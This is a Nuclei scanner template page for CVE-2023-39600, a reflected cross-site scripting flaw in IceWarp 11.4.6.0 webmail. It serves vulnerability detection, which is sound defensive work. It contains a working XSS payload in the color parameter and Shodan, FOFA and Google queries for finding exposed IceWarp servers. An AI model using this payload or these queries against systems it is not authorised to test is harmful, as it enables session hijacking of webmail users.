IceWarp 11.4.6.0 - Cross-Site Scripting
ID: CVE-2023-39600
Severity: medium
Author: Imjust0
Tags: cve,cve2023,icewarp,xss
Description
Section titled “Description”IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
YAML Source
Section titled “YAML Source”id: CVE-2023-39600
info: name: IceWarp 11.4.6.0 - Cross-Site Scripting author: Imjust0 severity: medium description: | IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. reference: - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 - https://icewarp.com - https://medium.com/%40katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.00071 epss-percentile: 0.30401 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp shodan-query: - title:"icewarp" - http.favicon.hash:2144485375 - http.title:"icewarp" fofa-query: - title="icewarp" - icon_hash=2144485375 google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss
http: - method: GET path: - '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
matchers-condition: and matchers: - type: word words: - "<img src=x onerror=confirm(document.domain)>" - "IceWarp" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a0046304402201380a7709ed1a16e0c2e47a3969c33349e52e9943e65001160e6bdce0722a41d022059f1562a84ac2b40ecc88a3113cc51cde62eb19ebbaf70b7643f88f1a32d2b32:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39600.yaml"